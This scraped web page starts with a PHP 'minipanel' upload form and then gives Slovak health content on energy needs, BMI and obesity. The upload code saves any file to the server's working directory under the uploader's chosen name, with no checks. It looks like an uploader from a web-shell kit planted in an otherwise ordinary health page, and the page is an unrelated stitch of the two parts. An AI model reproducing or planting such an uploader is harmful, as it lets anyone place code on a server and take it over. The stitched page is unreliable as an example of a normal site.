<head>
<style>
<!--
p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}-->
</style>
</head>

<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#66" cellpadding="5" height="1" width="100%" bgcolor="black" bordercolorlight="#c0c0c0" border="1">
<tr>
<a bookmark="minipanel" style="font-weight: normal; color: #009900; font-family: verdana; text-decoration: none">
<td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
<center>Upload<form method="POST" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload" style="font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #66; background-color: #009900">
<input type="file" name="userfile" style="font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #66; background-color: #009900"><input type="hidden" name="miniform" value="1" style="font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #66; background-color: #009900">
<input type="submit" name="submit" value="Upload" style="font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #66; background-color: #009900"><br><br>
<?php
$uploaddir = "";
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (isset($_FILES['userfile']['name'])) {
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded";
} else {
echo "There was an error uploading the file. please try again!";
}
}
?>
</form>
</center></td>
</tr>
</table>
</a>


Energetická potreba človeka

Každé ľudské telo je jedinečné a má svoju vlastnú energetickú potrebu. Táto potreba sa líši v závislosti od veku, pohlavia alebo fyzickej aktivity. My vám pomôžeme s približným výpočtom tej vašej.

Pohlavie


Hmotnost (kg)

Výška (cm)

Vek

BMI kalkulačka

Zaradenie jednoduchých pohybových aktivít do každodenného života pomáha spáliť kalórie, zlepšiť celkový zdravotný stav a dosiahnuť rovnováhu medzi tým čo skonzumujeme a vydáme.

Hmotnosť (kg)

Výška (cm)

Príčiny vzniku obezity závisia od mnohých faktorov a existuje všeobecná zhoda v názore, že nadváha vzniká z nerovnováhy prijatých a spálených kalórií.

Dosiahnuť energetickú rovnováhu je možné zmenou spotreby potravín (príjem energie) a aj fyzickou aktivitou (výdaj energie). Všetky zmeny v životospráve je potrebné dodržiavať určitú dobu, aby mali význam.

Už zaradenie jednoduchých pohybových aktivít do každodenného života a rozumná konzumácia energeticky bohatých potravín a nápojov prináša merateľné úspechy a prínos pre zdravie. Ako sa hovorí „všetkosmierou“